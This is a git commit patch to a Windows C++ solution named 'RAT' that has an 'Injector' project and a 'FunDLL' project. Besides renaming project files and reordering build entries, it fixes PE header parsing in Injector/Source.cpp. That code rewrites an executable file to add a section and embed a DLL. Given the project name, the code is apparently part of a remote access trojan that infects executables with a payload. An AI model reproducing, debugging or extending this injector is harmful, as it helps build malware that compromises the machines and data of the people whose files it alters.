From 89dbd15250787f10ec66dbd39b4f19ad1f56849d Mon Sep 17 00:00:00 2001 From: hellisabove <59116609+hellisabove@users.noreply.github.com> Date: Mon, 3 Jul 2023 03:05:34 +0300 Subject: [PATCH] Fixed Some Stuff --- FunDLL/{RAT.vcxproj => FunDLL.vcxproj} | 0 ...vcxproj.filters => FunDLL.vcxproj.filters} | 0 .../{RAT.vcxproj.user => FunDLL.vcxproj.user} | 0 Injector/Source.cpp | 11 ++++++---- RAT.sln | 20 +++++++++---------- 5 files changed, 17 insertions(+), 14 deletions(-) rename FunDLL/{RAT.vcxproj => FunDLL.vcxproj} (100%) rename FunDLL/{RAT.vcxproj.filters => FunDLL.vcxproj.filters} (100%) rename FunDLL/{RAT.vcxproj.user => FunDLL.vcxproj.user} (100%) diff --git a/FunDLL/RAT.vcxproj b/FunDLL/FunDLL.vcxproj similarity index 100% rename from FunDLL/RAT.vcxproj rename to FunDLL/FunDLL.vcxproj diff --git a/FunDLL/RAT.vcxproj.filters b/FunDLL/FunDLL.vcxproj.filters similarity index 100% rename from FunDLL/RAT.vcxproj.filters rename to FunDLL/FunDLL.vcxproj.filters diff --git a/FunDLL/RAT.vcxproj.user b/FunDLL/FunDLL.vcxproj.user similarity index 100% rename from FunDLL/RAT.vcxproj.user rename to FunDLL/FunDLL.vcxproj.user diff --git a/Injector/Source.cpp b/Injector/Source.cpp index d5a449b..0855b1c 100644 --- a/Injector/Source.cpp +++ b/Injector/Source.cpp @@ -23,11 +23,11 @@ INT main(INT arg, PCHAR argv[]) { BOOL file_read = ReadFile(x_file, file_buffer, file_size, &returned_bytes, NULL); if (file_read == TRUE && returned_bytes == file_size) { - PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)file_read; + PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)file_buffer; if (image_dos_header->e_magic == IMAGE_DOS_SIGNATURE) { // if PE valid - PIMAGE_FILE_HEADER image_file_header = (PIMAGE_FILE_HEADER)(file_read + image_dos_header->e_lfanew + sizeof(DWORD)); - PIMAGE_OPTIONAL_HEADER image_optional_header = (PIMAGE_OPTIONAL_HEADER) (file_read + image_dos_header->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER)); - PIMAGE_SECTION_HEADER image_section_header = (PIMAGE_SECTION_HEADER) (file_read + image_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS)); + PIMAGE_FILE_HEADER image_file_header = (PIMAGE_FILE_HEADER)(file_buffer + image_dos_header->e_lfanew + sizeof(DWORD)); + PIMAGE_OPTIONAL_HEADER image_optional_header = (PIMAGE_OPTIONAL_HEADER) (file_buffer + image_dos_header->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER)); + PIMAGE_SECTION_HEADER image_section_header = (PIMAGE_SECTION_HEADER) (file_buffer + image_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS)); WORD PESections = image_file_header->NumberOfSections; ZeroMemory(&image_section_header[PESections], sizeof(IMAGE_SECTION_HEADER)); @@ -61,6 +61,9 @@ INT main(INT arg, PCHAR argv[]) { // add section WriteFile(x_file, file_buffer, file_size, &returned_bytes, NULL); } + + // add file + WriteFile(x_file, file_buffer, file_size, &returned_bytes, NULL); } } LocalFree(dll_buffer); diff --git a/RAT.sln b/RAT.sln index b3ef064..6847389 100644 --- a/RAT.sln +++ b/RAT.sln @@ -3,10 +3,10 @@ Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio Version 17 VisualStudioVersion = 17.6.33815.320 MinimumVisualStudioVersion = 10.0.40219.1 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunDLL", "RAT\RAT.vcxproj", "{C7E129B4-8A7E-4E5C-A259-573609675FED}" -EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Injector", "Injector\Injector.vcxproj", "{9C556697-73D5-47E2-908C-B285CB253CC6}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunDLL", "FunDLL\FunDLL.vcxproj", "{C7E129B4-8A7E-4E5C-A259-573609675FED}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -15,14 +15,6 @@ Global Release|x86 = Release|x86 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.ActiveCfg = Debug|x64 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.Build.0 = Debug|x64 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.ActiveCfg = Debug|Win32 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.Build.0 = Debug|Win32 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.ActiveCfg = Release|x64 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.Build.0 = Release|x64 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.ActiveCfg = Release|Win32 - {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.Build.0 = Release|Win32 {9C556697-73D5-47E2-908C-B285CB253CC6}.Debug|x64.ActiveCfg = Debug|x64 {9C556697-73D5-47E2-908C-B285CB253CC6}.Debug|x64.Build.0 = Debug|x64 {9C556697-73D5-47E2-908C-B285CB253CC6}.Debug|x86.ActiveCfg = Debug|Win32 @@ -31,6 +23,14 @@ Global {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x64.Build.0 = Release|x64 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.ActiveCfg = Release|Win32 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.Build.0 = Release|Win32 + {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.ActiveCfg = Debug|x64 + {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.Build.0 = Debug|x64 + {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.ActiveCfg = Debug|Win32 + {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.Build.0 = Debug|Win32 + {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.ActiveCfg = Release|x64 + {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.Build.0 = Release|x64 + {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.ActiveCfg = Release|Win32 + {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE